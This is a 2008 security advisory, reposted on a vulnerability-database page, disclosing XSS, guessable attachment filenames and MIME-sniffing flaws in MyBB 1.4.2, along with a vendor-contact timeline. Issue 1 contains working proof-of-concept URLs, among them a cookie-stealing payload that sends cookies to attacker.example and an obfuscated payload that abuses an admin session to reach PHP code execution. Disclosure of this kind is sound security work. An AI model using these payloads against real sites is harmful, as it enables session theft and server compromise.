Lucene search
K

mybbs142-multi.txt

🗓️ 27 Oct 2008 00:00:00Reported by Micheal CottinghamType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

MyBB 1.4.2 - Multiple Vulnerabilities in PHP platform with XSS and CSRF issue

Code
`======================================================================  
  
Advisory: MyBB 1.4.2 - Multiple Vulnerabilities  
Release Date: October 27 2008  
Application: MyBB  
Version: MyBB 1.4.2  
Platform: PHP  
Vendor URL: http://www.mybboard.net/  
Authors: Kellanved, NeoThermic, Techie-Micheal  
  
=======================================================================  
  
Overview  
  
Due to various failures in sanitising user input, MyBB is vulnerable  
to XSS. This is enough to circumvent CSRF protection and to inject  
PHP code. We deeply regret having to disclose this, but we were not  
able receive an appropriate response due to the vendor claiming these  
issues are not vulnerabilities when they are and their security tracker  
being down.  
  
Therefore, this is being released so that the users of MyBB will be  
able to find a patch to keep them safe from these severe issues.  
  
=======================================================================  
  
Discussion  
  
MyBB is a discussion board that has been around for a while; it has  
evolved from other bulletin boards into the forum package it is today.  
Therefore, it is a professional and efficient discussion board,  
developed by an active team of developers.  
  
  
Due to the misuse/improper validation of the url parameter during an AJAX  
request, we were able to cause XSS, contrary to statements made  
by the developers of MyBB. This XSS has the ability to cause  
Remote Code Execution, making it critical in nature. As XSS can be easily  
used to circumvent MyBB's CSRF protection, it is possible to inject PHP  
code into the template via the ACP with any of the XSS issues. This is  
facilitated by the constant form tokens used in MyBB and by the use of  
PHP double-quoted strings as template variables. The former makes it easy  
to write escalating exploits, the latter allows PHP injection using the  
curly brace notation.  
  
Secondly, it is possible to guess the attachment filenames based  
on known factors, making it easy to break IE's poor MIME handling,  
including IE8. Given the user ID and post time, uploaded files are easily  
"guessed."  
  
Lastly, due to an incomplete fix, MyBB does not properly fix a MIME-  
sniffing issue, making it possible to exploit IE6-8.  
  
=======================================================================  
  
  
Issue 1: XSS using the AJAX switch for redirects  
  
The redirect() function uses an AJAX switch to allow JavaScript redirects  
instead of HTTP.  
  
This can be exploited by using single quotes which are not escaped by  
htmlspecialchars. This XSS is particularly grave, as it affects moderators  
and administrators, allowing attackers to take actions with escalated  
privileges, which can result in PHP and SQL injection (see recent vB exploits).  
  
This was not fixed in 1.4.2.  
  
PoC:  
http://www.victim.example/mybb/moderation.php?action=removesubscriptions&ajax=1&url='  
%2Balert('XSS!')//  
  
Cookie Stealing PoC:  
http://www.victim.example/mybb/moderation.php?action=removesubscriptions&ajax=1&url=%27%20%2B%27http://www.attacker.example/cookiejar.php?c=%27%2Bdocument.cookie//  
  
Remote Code Execution PoC:  
http://www.victim.example/mybb/moderation.php?action=removesubscriptions&ajax=1&url=%27%2Beval(%22u%3D%27application%2Fx-www-%27%2B%20%27form-urlencoded%27%22%2B%20String.fromCharCode(59)%20%2B%22c%3D%27Content-type%27%22%2B%20String.fromCharCode(59)%20%2B%22d%3D%27Content-length%27%22%2B%20String.fromCharCode(59)%20%2B%22reg%3Dnew%20XMLHttpRequest()%22%2B%20String.fromCharCode(59)%20%2B%22reg.open(%27GET%27%2C%20%27http%3A%2F%2Fwww.victim.example%2Fmybb%2Fadmin%2Findex.php%3Fmodule%3Dconfig%2Fmycode%26action%3Dadd%27%2C%20false)%22%2B%20String.fromCharCode(59)%20%2B%22reg.send(null)%22%2B%20String.fromCharCode(59)%20%2B%22r%3Dreg.responseText%22%2B%20String.fromCharCode(59)%20%2B%22t%3D%27http%3A%2F%2Fwww.victim.example%2Fmybb%2Fadmin%2Findex.php%3Fmodule%3Dconfig%2Fmycode%26action%3Dadd%27%22%2B%20String.fromCharCode(59)%20%2B%22t2%3D%27%26replacement%3D%241%26active%3D1%26my_post%22%20%20%20%20%2B%22_key%3D%27%2Br.substr(r.indexOf(%27my_post_%22%20%2B%22key%27%2B%20%27%27)%2B15%2C32)%22%2F*%20%20%20%20%20%20*%2F%2B%22%20%2B%27%26title%3DPwned%26description%27%2B%20%27%3Dfoo%26regex%3D%22%20%20%20%20%20%20%20%2B%22evil(.*)evil%2523e%2500test%27%22%2B%20String.fromCharCode(59)%20%2B%22r2%3Dnew%20XMLHttpRequest()%22%2B%20String.fromCharCode(59)%20%2B%22r2.open(%27POST%27%2Ct%2Cfalse)%22%2B%20String.fromCharCode(59)%20%2B%22r2.setRequestHeader(d%2Ct2.length)%22%2B%20String.fromCharCode(59)%20%2B%22r2.setRequestHeader(c%2Cu)%22%2B%20String.fromCharCode(59)%20%2B%22r2.sendAsBinary(t2)%22%2B%20String.fromCharCode(59))//  
  
  
All that is required is an active admin session for cookie stealing and  
Remote Code Execution.  
  
This adds the BBcode evil and can be used as follows:  
  
evilphpinfo()evil  
  
Note: The %20 padding is necessary and must be custom-tailored to the  
victim due to how  
MyBB handles posting, if using the posting form. However, CSRF can be  
used instead of posting  
directly to the site.  
  
Issue 2: "Guessing" of attachment filenames  
  
On certain server setups running MyBB, it is possible to guess the filename  
of an uploaded file. The code in question is this:  
  
$filename = "post_".$mybb->user['uid']."_".time().".attach";  
  
This creates a filename of the following: post_1234_[unix timestamp].attach.  
  
This makes it very easy to guess the filename and bypass any sort of MIME-  
sniffing protection. It also means privilege escalation, as attachments can  
be read regardless of the user's permissions. It is not even hard to guess the  
filename without knowing the post time - just a few million attempts due to the  
weak randomization used.  
  
Issue 3: Incomplete protection against MIME-sniffing.  
  
MyBB fails to properly deliver uploaded files in a way that avoids  
MIME-sniffing by the Internet Explorer family of browsers. This can  
be exploited to upload files that will be interpreted as HTML by  
Internet Explorer. As this vulnerability is present in many applications,  
we will not provide a PoC.  
  
  
None of the reported issues were fixed in the 1.4.2 release or since.  
  
=======================================================================  
  
History  
  
August 18 2008: Vendor contacted  
September 02 2008: Vendor contacted again, due to no response  
September 03 2008: Vendor announced full source audit to be performed  
by Gulftech  
September 17 2008: Patch released, vulnerabilities incorrectly  
credited to Gulftech, two out of three vulnerabilities left  
exploitable, with the XSS and the MIME-sniffing  
September 17 2008: After learning about the release from sources other  
than the vendor, FD  
September 23/24 2008: Emailed again in an attempt to ensure MyBB  
understood the severity of the MIME-sniffing vulnerability and  
alerting them to the XSS  
October 05/06 2008: MyBB replied that the XSS was a non-issue  
October 27 2008: Release after MyBB has failed to release a fix after  
numerous attempts to explain the severity of the vulnerabilities,  
Issue 2 was previously unreported  
  
=======================================================================  
  
=======================================================================  
  
Solution  
  
For users: Per usual, update as soon as a patch becomes available.  
  
For MyBB: Give credit to researchers where due.  
  
=======================================================================  
  
Fun quote for the day (and mention of a really good book):  
  
"What we found was startling: Security and coding flaws were so  
prevalent that an attack might be delayed because the attacker might  
get stuck trying to choose from all the different vulnerabilities to  
exploit without knowing where to turn first. (Such delay tactics are  
not recommended as a security strategy.)" - Aviel D. Rubin, Exploiting  
Software: How to Break Code, Foreword  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation